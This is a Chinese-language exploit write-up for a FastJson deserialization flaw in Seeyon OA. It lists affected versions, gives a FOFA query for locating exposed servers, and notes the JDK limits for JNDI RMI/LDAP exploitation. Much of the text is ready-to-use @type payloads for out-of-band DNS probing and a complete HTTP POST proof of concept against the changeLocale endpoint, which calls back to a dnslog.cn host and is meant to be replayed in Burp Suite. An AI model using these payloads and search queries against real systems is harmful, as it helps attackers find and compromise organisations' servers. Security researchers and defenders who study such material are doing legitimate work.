致远伪0day-FastJson利用链

0x01 影响范围

V7.1、V7.1SP1
V7.0、V7.0SP1、V7.0SP2、V7.0SP3
V6.1、V6.1SP1、V6.1SP2
V6.0、V6.0SP1
V5.6、V5.6SP1

0x02 漏洞搜索

搜索语法

FOFA:"seeyon" && after="2021-05-01"

0x03 漏洞检测

Jndi影响范围:
1、rmi的利用方式:适用jdk版本:JDK 6u132、JDK 7u122、JDK 8u113之前
2、ldap的利用方式:适用jdk版本:JDK 11.0.1、8u191、7u201、6u211之前

区分FastJson与Jackson:
1)不闭合花括号看报错信息方法
2)减少参数方法
  {“name”:“S”, “age”:21}//Fastjson 是不会报错
  {“name”:“S”, “age”:21,“xxx”:123}// Jackson 语法相对比较严格,会报错
3)fastjson报错关键词:

com.alibaba.fastjson.JSONException , 触发方式如下
 {“x”:"
 [“x”:1]
 {“x”:{"@type":“java.lang.AutoCloseable”

DNS探测方法:
注意:Content-Type: application/json

# 未报错poc
{"x":{"@type":"java.net.InetSocketAddress"{"address":,"val":"dnslog"}}}
{"x":{{"@type":"java.net.URL","val":"http://dnslog"}:"x"}}
{"x":{"@type":"com.alibaba.fastjson.JSONObject", {"@type": "java.net.URL", "val":"http://dnslog"}}""}}

# 报错,但仍有效
{"x":{"@type":"java.net.Inet4Address","val":"dnslog"}}
{"x":{"@type":"java.net.Inet6Address","val":"dnslog"}}
{"x":Set[{"@type":"java.net.URL","val":"http://dnslog"}]}

# 报错,且返回400,但仍有效
{"x":Set[{"@type":"java.net.URL","val":"http://dnslog"}}
{"x":{{"@type":"java.net.URL","val":"http://dnslog"}:0}

0x04 漏洞复现

1.使用dnslog验证漏洞, 打开http://www.dnslog.cn获取域名

漏洞POC

POST /seeyon/main.do?method=changeLocale HTTP/1.1
Host: xxxxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 71

_json_params={"@type":"java.net.Inet4Address","val":"qn94mq.dnslog.cn"}

3.将上面的代码放到BurpSuite中,然后设置好对应的HOST和端口。

查看dnslog 成功回显, 说明存在漏洞